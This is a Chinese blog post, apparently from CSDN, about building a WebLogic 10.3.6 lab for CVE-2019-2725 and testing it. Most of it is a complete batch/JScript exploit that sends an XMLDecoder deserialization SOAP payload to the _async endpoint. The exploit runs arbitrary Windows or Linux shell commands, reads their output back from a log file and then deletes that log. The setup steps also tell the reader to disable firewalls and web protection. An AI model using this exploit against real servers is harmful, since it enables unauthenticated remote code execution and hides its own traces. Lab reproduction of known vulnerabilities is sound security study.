CVE-2019-2725漏洞环境搭建与测试

最新推荐文章于 2024-05-26 13:24:31 发布
最新推荐文章于 2024-05-26 13:24:31 发布
阅读量8.1k 收藏 2
点赞数 1
分类专栏: 渗透学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44001905/article/details/98765483
版权

搭建漏洞环境(被攻击)

  1. 安装weblogic 10.3.6.0
    1. 关闭windows防火墙
    2. 打开安装包,一直下一步,直到出现如下界面

然后一直下一步

安装完成后

      

进入C:\Oracle\Middleware\user_projects\domains\base_domain,双击脚本

     用浏览器访问http://127.0.0.1:7001/console/login/LoginForm.jsp出现界面则搭建完成

通过 ipconfig 查看被攻击环境IP地址用作攻击地址

搭建攻击测试环境

攻击测试流程

1. 关闭攻击机的防火墙 ,关闭web服务防护

2. 打开cmd,将cve2019-2725_weblogic_rce.bat拖入窗口,会显示文件的当前位置,加一个空格,输入http://192.168.xxx.xxx:7001 “ver”

 

点击回车,查看被攻击机反应

 

@if (@vul) == (@VUL) @end /*****
@echo off
title cve2019-2725_RCE - Weblogic _async remote command execution by Flyfish
cscript //E:JScript //nologo "%~f0" "%~nx0" %* 
exit /b %errorlevel%
CVE-2019-2725 weblogic_rce command execution output version 
Author:Flyfish
https://github.com/FlyfishSec/weblogic_rce *****/

whr = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
args = WScript.Arguments;
exp_str = Math.random();
payload_xml_pre = "<soapenv:Envelope xmlns:soapenv=\"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\" xmlns:wsa=\"http:\/\/www.w3.org\/2005\/08\/addressing\" xmlns:asy=\"http:\/\/www.bea.com\/async\/AsyncResponseService\">  \r\n  <soapenv:Header> \r\n    <wsa:Action>log<\/wsa:Action>\r\n    <wsa:RelatesTo>log<\/wsa:RelatesTo>\r\n    <work:WorkContext xmlns:work=\"http:\/\/bea.com\/2004\/06\/soap\/workarea\/\">";
payload_xml_suff = "    <\/work:WorkContext>\r\n  <\/soapenv:Header>\r\n  <soapenv:Body>\r\n    <asy:onAsyncDelivery\/>\r\n  <\/soapenv:Body>\r\n<\/soapenv:Envelope>";
payload_xml_win_pre = "<java class=\"java.beans.XMLDecoder\"> \r\n        <object class=\"java.lang.Runtime\" method=\"getRuntime\"> \r\n          <void method=\"exec\"> \r\n            <array class=\"java.lang.String\" length=\"3\"> \r\n              <void index=\"0\"> \r\n                <string>c:\\windows\\system32\\cmd.exe<\/string> \r\n              <\/void>  \r\n              <void index=\"1\"> \r\n                <string>\/c<\/string> \r\n              <\/void>  \r\n              <void index=\"2\"> \r\n                <string>";
payload_xml_linux_pre = "<java version=\"1.4.0\" class=\"java.beans.XMLDecoder\"> \r\n        <void class=\"java.lang.ProcessBuilder\"> \r\n          <array class=\"java.lang.String\" length=\"3\"> \r\n            <void index=\"0\"> \r\n              <string>\/bin\/bash<\/string> \r\n            <\/void>  \r\n            <void index=\"1\"> \r\n              <string>-c<\/string> \r\n            <\/void>  \r\n            <void index=\"2\"> \r\n              <string>";
payload_xml_win_suff = "<\/string> \r\n              <\/void> \r\n            <\/array> \r\n          <\/void> \r\n        <\/object> \r\n      <\/java>";
payload_xml_linux_suff = "<\/string> \r\n            <\/void> \r\n          <\/array>  \r\n          <void method=\"start\"\/>\r\n        <\/void> \r\n      <\/java>";
command_output_linux = " > .\/servers\/AdminServer\/tmp\/_WL_internal\/bea_wls9_async_response\/8tpkys\/war\/access.log";
command_output_win = " > .\/servers\/AdminServer\/tmp\/_WL_internal\/bea_wls9_async_response\/8tpkys\/war\/access" + exp_str + ".log";
command_linux_clean = "rm -f .\/servers\/AdminServer\/tmp\/_WL_internal\/bea_wls9_async_response\/8tpkys\/war\/access.log";
command_win_clean = "del \/q .\\servers\\AdminServer\\tmp\\_WL_internal\\bea_wls9_async_response\\8tpkys\\war\\access*.log";

if (args.Length == 3 ) {
    url = args.Item(1) + "/_async/AsyncResponseService";
    command_output_linux = args.Item(2) + command_output_linux
    payload = payload_xml_pre + payload_xml_linux_pre + command_output_linux + payload_xml_linux_suff + payload_xml_suff;
    request(url);
    WScript.Sleep(202);
        if (whr.status == "202"){
        url = args.Item(1) + "/_async/access.log"
        payload = "";
        request(url)
        //WScript.Echo(whr.status);
        //WScript.Echo(whr.statustext);
        if (whr.status == "200") {
            WScript.Echo();
            WScript.Echo(whr.responseText);
            url = args.Item(1) + "/_async/AsyncResponseService";
            payload = payload_xml_pre + payload_xml_linux_pre + command_linux_clean + payload_xml_linux_suff + payload_xml_suff;
            request(url);
        } else if (whr.status != "200") {
            url = args.Item(1) + "/_async/AsyncResponseService";
            command_output_win = args.Item(2) + command_output_win;
            payload = payload_xml_pre + payload_xml_win_pre + command_output_win + payload_xml_win_suff + payload_xml_suff;
            request(url);
            WScript.Sleep(202);
	if (whr.status == "202") {
                    url = args.Item(1) + "/_async/access" + exp_str + ".log";
                    payload = "";
                    request(url);
                    if (whr.status == "200") {
                        WScript.Echo(whr.responseText);
                        //WScript.Echo(url);
                        url = args.Item(1) + "/_async/AsyncResponseService";
	                payload = payload_xml_pre + payload_xml_win_pre + command_win_clean + payload_xml_win_suff + payload_xml_suff;
                        request(url);
                } else {
                    WScript.Echo("-The Command execution failed");
                }
            } else {
                WScript.Echo("-The vulnerability does not exist");
            }
        } else {
            WScript.Echo("-The Command execution failed");
        }
    } else {
        WScript.Echo("-The vulnerability does not exist");     
    }
    WScript.Quit(666);
} else {
    WScript.Echo("-Wrong arguments!");
}
function request(url) {
    var RESOLVE_TIMEOUT = 10000;
    var CONNECT_TIMEOUT = 15000;
    var SEND_TIMEOUT = 10000;
    var RECEIVE_TIMEOUT = 15000;
    whr.open('POST', url, false);
    whr.Option(4) = 13056;  
    whr.Option(6) = false; 
    whr.SetRequestHeader("User-Agent", "Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3");
    whr.setRequestHeader("Accept", "*/*")
    whr.setRequestHeader("Content-Type","text/xml")
    whr.SetRequestHeader("Referer", "http://www.baidu.com/")
    whr.SetRequestHeader("Cache-Control","no-cache");
    whr.SetRequestHeader("Connection", "Close")
    whr.send(payload);
}

 

Iam0x17
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Weblogic反序列化远程代码执行漏洞CVE-2019-2725)复现
hackzkaq的博客
03-10 4030
更多黑客技能 公众号:小道黑客 0x01 漏洞描述: wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。 0x02 影响版本: Oracle WebLogic Server10.x Oracle WebLogic Server12.1.3.0.0 0x03 影响组件: wls9_async_res
weblogic 漏洞统计 CVE
09-18
1.CVE-2016-0696 2.CVE-2016-0700 3.CVE-2016-0675 4.CVE-2016-3416 5.CVE-2016-0688 6.CVE-2016-0638 7.CVE-2015-2623 8.CVE-2015-4744 9.CVE-2014-2480 10.CVE-2014-2481 11.CVE-2014-4256 12.CVE-2014-4242 13.CVE-2014-4253 14.CVE-2014-4267 15.CVE-2014-4255 16.CVE-2014-4254 17.CVE-2014-2479 18.CVE-2014-4210 19.CVE-2014-4241 20.CVE-2014-4217 21.CVE-2014-4201 22.CVE-2014-4202 23.CVE-2013-1504 24.CVE-2013-2390 25.CVE-2017-3506 26.CVE-2017-1181 27.CVE-2016-3445 28.CVE-2016-3510 29.CVE-2016-3586 30.CVE-2016-5531 31.CVE-2015-7501 32.CVE-2016-5488 33.CVE-2016-3505 34.CVE-2016-5535 35.CVE-2014-2470 36.CVE-2016-0464 37.CVE-2014-0107 38.CVE-2016-0572 39.CVE-2016-0573 40.CVE-2016-0574 41.CVE-2016-0577 42.CVE-2014-0114 43.CVE-2014-6534 44.CVE-2014-6499 45.CVE-2013-3827 46.CVE-2013-2027 47.CVE-2017-10063 48.CVE-2017-10147 49.CVE-2017-10148 50.CVE-2017-10178 51.CVE-2017-5638 52.CVE-2017-10137 53.CVE-2017-10336 54.CVE-2017-10152 55.CVE-2017-10352 56.CVE-2017-10334 57.CVE-2014-3566 58.CVE-2015-0449 59.CVE-2014-6569 60.CVE-2013-2186 61.CVE-2017-3248 62.CVE-2011-1411 63.CVE-2011-5035 这些漏洞修复情况
Weblogic反序列化漏洞CVE-2019-2725
chaojixiaojingang
01-29 4508
1.漏洞描述 wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。 2.影响版本 Weblogic 10.x Weblogic 12.1.3 3.漏洞环境搭建 在docker中搭建weblogic环境,进入/vulhub/weblogic/CVE-2017-10271目录 ...
CMS Made Simple (CMSMS) < 2.2.10 前台SQL注入漏洞CVE-2019-9053)
最新发布
shierbai的博客
05-26 199
结合后台的 SSTI 漏洞([CVE-2021-26120](https://github.com/vulhub/vulhub/tree/master/cmsms/CVE-2021-26120)),攻击者可在目标服务器上执行任意代码。安装过程请根据页面中的安装向导来进行,其中MySQL数据库的地址是`db`,数据库名是`cmsms`,账号和密码均为`root`。使用中的脚本来利用SQL注入漏洞
CVE-2019-2725复现(从环境搭建到getshell)
1stPeak's Blog
07-16 6148
前言 今天复现CVE-2019-2725时从环境搭建到getshell,这一篇文章是我测试之后总结的一次完整的复现测试流程,供大家参考,如有不足,欢迎指正。 漏洞描述 Oracle WebLogic Server反序列化漏洞 ,该远程代码执行漏洞无需身份验证即可远程利用,即无需用户名和密码即可通过网络利用。 影响版本 Oracle WebLogic Server,版本 10.3.6.0、12.1.3.0 测试环境准备 注:我这里主要介绍linux下weblogic的搭建 1、Ubuntu 我用的ubuntu
CVE-2019-2725
qq_52988816的博客
02-13 1049
在学习内网过程中遇到了weblogic比较常见的漏洞,编号是cve-2019-2725,之前没有总结过,于是本篇文章给大家总结归纳一下该漏洞的利用方法与原理。简单分析了一下cve-2019-2725漏洞的原理以及攻击修复方法,因为之前没有总结所以特地写一个文章总结一下,如果对大家有帮助不妨一键三连支持一下。
weblogic_CVE-2019-2725
Longwaer
01-16 1443
通过笔记学习Weblogic漏洞原理,快速掌握复现技巧。
Jackson_RCE-CVE-2019-12384:CVE-2019-12384 漏洞测试环境
05-26
环境搭建 将项目导入到idea,再配置好maven之后设置自动导入依赖库,然后在本地的web空目录写入如下文件,保存为exec.sql。并启动一个http server: CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd&...
CVE-2019-17564 Apache Dubbo Http 反序列化漏洞深入分析 .pdf
09-05
2019年,Apache Dubbo暴露了一个严重的安全漏洞,即CVE-2019-17564,这是一个Http反序列化漏洞。该漏洞发生在启用HTTP远程处理的Dubbo应用程序中,攻击者可以通过发送包含恶意Java对象的POST请求,导致不安全的反...
CVE-2020-13933 靶场: shiro 认证绕过漏洞.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
Docker简单搭建Vulfocus靶场 CN-SEC 中文网.pdf
02-07
Vulfocus是一个功能强大且实用的靶场平台,能够帮助安全研究人员和渗透测试人员快速搭建和管理漏洞靶场环境。通过本文,读者可以了解Vulfocus平台的基本概念和搭建方法,并学习如何使用Vulfocus平台进行漏洞研究和...
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .txt
06-27
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .网上几乎没有,请珍惜。
cve-2019-2725修复相关的补丁p29694149_10360190115_Generic.zip
06-03
cve-2019-2725修复相关的补丁和jdk等 cve-2019-2725补丁安装过程中使用到的材料 仅用于学习,如果用于商业,产生版权纠纷,与本人无关。
Weblogic反序列化漏洞(CVE-2019-2725)复现
小小猪的博客
11-22 2257
Weblogic反序列化漏洞(CVE-2019-2725)复现 漏洞描述: CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。 影响范围: weblogic 10.x weblogic 12.1.3 漏洞复现: 环境介绍: 攻击机:Windows7   靶机:Windows7(apache tomca...
weblogic 远程代码执行 (CVE-2019-2725)
YouthBelief的博客
11-03 2058
@[TOC](weblogic 远程代码执行 (CVE-2019-2725)) weblogic 远程代码执行 (CVE-2019-2725) 这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。 0x01 漏洞描述 Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管
cve2019-2725复现
Ping_Pig的博客
11-19 2039
漏洞存在于异步通讯服务,可通过访问路径/_async/AsyncResponseService,判断不安全组件是否开启 docker搭建环境: docker pull ismaleiva90/weblogic12 docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest ...
[Vulfocus解题系列] weblogic 远程代码执行 (CVE-2019-2725)
00勇士王子的博客
07-15 797
漏洞介绍 名称: weblogic 远程代码执行 (CVE-2019-2725) 描述: Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 由于在反序列化处理输入信息的过程中存在缺陷,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,利用该漏洞获取服务器权限,实现远程代码执行。 解题过程 1.访问靶场 2.漏洞存在于:_async/
CVE-2019-2725漏洞复现
yeshankuangrenaaaaa的博客
07-23 4426
CVE-2019-2725漏洞复现???? Author:Iron Date:2020-07-10 漏洞描述 漏洞发布日期:2019-4-17 Weblogic反序列化远程代码执行漏洞。由于在反序列化处理输入信息的过程中存在缺陷,未经授权的攻击者可以发送特意构造的恶意HTTP请求,利用该漏洞获取服务器权限,实现远程代码执行。 漏洞原理 该漏洞存在于wls9-async组件,该组件为异步通讯服务,攻击者可以在/_async/AsyncResponseService路径下传入恶意的xml格式的数据,传入的数据在
cve-2019-2725补丁安装过程
bu1216shi的博客
06-03 3902
Weblogic反序列化远程代码执行漏洞CVE-2019-2725)补丁安装过程分享 oracle官网给的信息如下applprod账户把java进程都关掉,具体如下升级jdk备份weblogic 具体如下:删除历史的weblogic里发布相关的临时文件,具体如下applprod账户 修改bsu.sh 如下:applprod账户 上传补丁如下:weblogic domain里的修改改名weblog...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值